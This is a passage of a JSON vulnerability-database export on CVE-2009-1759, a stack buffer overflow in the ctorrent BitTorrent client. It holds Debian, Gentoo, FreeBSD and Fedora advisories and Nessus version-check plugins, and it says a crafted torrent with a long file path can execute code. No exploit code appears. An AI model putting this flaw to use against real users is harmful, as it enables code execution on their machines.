no\nDebian bug : 530255\nCVE ID : CVE-2009-1759\n\n\nMichael Brooks discovered 
that ctorrent, a text-mode bittorrent client,\ndoes not verify the length of file paths in torrent files. An attacker\ncan exploit this via a crafted torrent that contains a long file path to\nexecute arbitrary code with the rights of the user opening the file.\n\n\nThe oldstable distribution (etch) does not contain ctorrent.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.4-dnh3.2-1.1.\n\n\nWe recommend that you upgrade your ctorrent packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1.diff.gz\n Size/MD5 checksum: 6427 a8eb130df614638863d1de39f80aeb3c\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1.dsc\n Size/MD5 checksum: 1132 2159a81d35c934811cc4b65a5d51c63e\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2.orig.tar.gz\n Size/MD5 checksum: 201651 8c4605ea3a1f6d09da593c25b5ab7dbd\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_alpha.deb\n Size/MD5 checksum: 124858 
5fce08bb15b4706ae4dc25c20a9da7b4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_amd64.deb\n Size/MD5 checksum: 112618 34ca707d68325c7b3939338d0b0ca7c2\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_arm.deb\n Size/MD5 checksum: 111212 8e4c1fa0ef849a48d3a87e5f68543520\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_armel.deb\n Size/MD5 checksum: 109968 60648ec18a34e50b483fbbf3dacba958\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_hppa.deb\n Size/MD5 checksum: 126318 e784df9d63ad73e20cc295f9afd3a436\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_i386.deb\n Size/MD5 checksum: 107962 d17a52c0f1c4f78cb912159719eaca5d\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_ia64.deb\n Size/MD5 checksum: 161648 179939230644da247cc342e8b2695df4\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_mips.deb\n Size/MD5 checksum: 123522 efe46dd5e1f6604d01e4e9dccedae3d6\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_mipsel.deb\n Size/MD5 checksum: 124204 5af9aa2d675d420684e78250663098a1\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_powerpc.deb\n Size/MD5 checksum: 123882 ee2163a4290b1c617e5b0a90caa7b4c4\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_s390.deb\n Size/MD5 checksum: 115012 
fcb29b56a042601293a48ae9a406fc0b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/c/ctorrent/ctorrent_1.3.4-dnh3.2-1+lenny1_sparc.deb\n Size/MD5 checksum: 111682 149c6237664380b0d6c6cb74a3006e0d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2009-06-17T22:10:25", "published": "2009-06-17T22:10:25", "id": "DEBIAN:DSA-1817-1:FA2AD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00129.html", "title": "[SECURITY] [DSA 1817-1] New ctorrent packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "### Background\n\nCTorrent is a BitTorrent client implemented in C++ to be lightweight and quick. \n\n### Description\n\nCTorrent contains a stack-based buffer overflow in the btFiles::BuildFromMI function in trunk/btfiles.cpp. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted torrent file using CTorrent, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CTorrent users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-p2p/ctorrent-3.3.2-r1\"", "edition": 1, "modified": "2013-11-22T00:00:00", "published": "2013-11-20T00:00:00", "id": "GLSA-201311-11", "href": "https://security.gentoo.org/glsa/201311-11", "type": "gentoo", "title": "CTorrent: User-assisted arbitrary code execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "\nSecurityfocus reports:\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\n\t vulnerability because the software fails to properly\n\t bounds-check user-supplied input before copying it to an\n\t insufficiently sized memory buffer.\nSuccessful exploits allow remote attackers to execute\n\t arbitrary machine code in the context of a vulnerable\n\t application. Failed exploit attempts will likely result in\n\t denial-of-service conditions.\n\n", "edition": 4, "modified": "2009-10-15T00:00:00", "published": "2009-10-15T00:00:00", "id": "83D7D149-B965-11DE-A515-0022156E8794", "href": "https://vuxml.freebsd.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html", "title": "Enhanced cTorrent -- stack-based overflow", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "Enhanced CTorrent is a BitTorrent client for unix-like environments. High performance with minimal system resources and dependencies are a priority. 
", "modified": "2009-08-25T04:42:00", "published": "2009-08-25T04:42:00", "id": "FEDORA:4FC6A10F8B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: ctorrent-1.3.4-7.dnh3.3.2.fc10", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1759"], "description": "Enhanced CTorrent is a BitTorrent client for unix-like environments. High performance with minimal system resources and dependencies are a priority. ", "modified": "2009-08-25T04:27:00", "published": "2009-08-25T04:27:00", "id": "FEDORA:0A79010F877", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: ctorrent-1.3.4-10.dnh3.3.2.fc11", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:07:37", "description": "Security update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-08-25T00:00:00", "title": "Fedora 11 : ctorrent-1.3.4-10.dnh3.3.2.fc11 (2009-8897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-08-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:ctorrent", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-8897.NASL", "href": "https://www.tenable.com/plugins/nessus/40758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8897.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40758);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_xref(name:\"FEDORA\", value:\"2009-8897\");\n\n script_name(english:\"Fedora 11 : ctorrent-1.3.4-10.dnh3.3.2.fc11 (2009-8897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes a stack-based buffer overflow (CVE-2009-1759).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501813\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028280.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?86788e38\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ctorrent package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"ctorrent-1.3.4-10.dnh3.3.2.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:37", "description": "Security update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2009-08-25T00:00:00", "title": "Fedora 10 : ctorrent-1.3.4-7.dnh3.3.2.fc10 (2009-8969)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-08-25T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:ctorrent"], "id": "FEDORA_2009-8969.NASL", "href": "https://www.tenable.com/plugins/nessus/40759", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-8969.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40759);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_xref(name:\"FEDORA\", value:\"2009-8969\");\n\n script_name(english:\"Fedora 10 : ctorrent-1.3.4-7.dnh3.3.2.fc10 (2009-8969)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes a stack-based buffer overflow (CVE-2009-1759)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=501813\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-August/028372.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?02a9f1d9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ctorrent package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"ctorrent-1.3.4-7.dnh3.3.2.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:30", "description": "Michael Brooks discovered that ctorrent, a text-mode bittorrent\nclient, does not verify the length of file paths in torrent files. An\nattacker can exploit this via a crafted torrent that contains a long\nfile path to execute arbitrary code with the rights of the user\nopening the file.\n\nThe oldstable distribution (etch) does not contain ctorrent.", "edition": 26, "published": "2009-06-18T00:00:00", "title": "Debian DSA-1817-1 : ctorrent - stack-based buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-06-18T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:ctorrent"], "id": "DEBIAN_DSA-1817.NASL", "href": "https://www.tenable.com/plugins/nessus/39440", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1817. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39440);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_xref(name:\"DSA\", value:\"1817\");\n\n script_name(english:\"Debian DSA-1817-1 : ctorrent - stack-based buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michael Brooks discovered that ctorrent, a text-mode bittorrent\nclient, does not verify the length of file paths in torrent files. An\nattacker can exploit this via a crafted torrent that contains a long\nfile path to execute arbitrary code with the rights of the user\nopening the file.\n\nThe oldstable distribution (etch) does not contain ctorrent.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=530255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1817\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the ctorrent packages.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.3.4-dnh3.2-1+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"ctorrent\", reference:\"1.3.4-dnh3.2-1+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:46:42", "description": "Securityfocus reports :\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\nvulnerability because the software fails to properly bounds-check\nuser-supplied input before copying it to an insufficiently sized\nmemory buffer.\n\nSuccessful exploits allow remote attackers to execute arbitrary\nmachine code in the context of a vulnerable application. 
Failed\nexploit attempts will likely result in denial-of-service conditions.", "edition": 25, "published": "2009-10-30T00:00:00", "title": "FreeBSD : Enhanced cTorrent -- stack-based overflow (83d7d149-b965-11de-a515-0022156e8794)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2009-10-30T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ctorrent"], "id": "FREEBSD_PKG_83D7D149B96511DEA5150022156E8794.NASL", "href": "https://www.tenable.com/plugins/nessus/42310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42310);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n\n script_name(english:\"FreeBSD : Enhanced cTorrent -- stack-based overflow (83d7d149-b965-11de-a515-0022156e8794)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Securityfocus reports :\n\ncTorrent and dTorrent are prone to a remote buffer-overflow\nvulnerability because the software fails to properly bounds-check\nuser-supplied input before copying it to an insufficiently sized\nmemory buffer.\n\nSuccessful exploits allow remote attackers to execute arbitrary\nmachine code in the context of a vulnerable application. 
Failed\nexploit attempts will likely result in denial-of-service conditions.\"\n );\n # http://sourceforge.net/tracker/?func=detail&aid=2782875&group_id=202532&atid=981959\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10585669\"\n );\n # https://vuxml.freebsd.org/freebsd/83d7d149-b965-11de-a515-0022156e8794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5528b800\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ctorrent<3.3.2_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:55:18", "description": "The remote host is affected by the vulnerability described in GLSA-201311-11\n(CTorrent: User-assisted arbitrary code execution)\n\n CTorrent contains a stack-based buffer overflow in the\n btFiles::BuildFromMI function in trunk/btfiles.cpp.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted\n torrent file using CTorrent, possibly resulting in execution of arbitrary\n code with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2013-11-21T00:00:00", "title": "GLSA-201311-11 : CTorrent: User-assisted arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1759"], "modified": "2013-11-21T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ctorrent", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201311-11.NASL", "href": "https://www.tenable.com/plugins/nessus/70995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
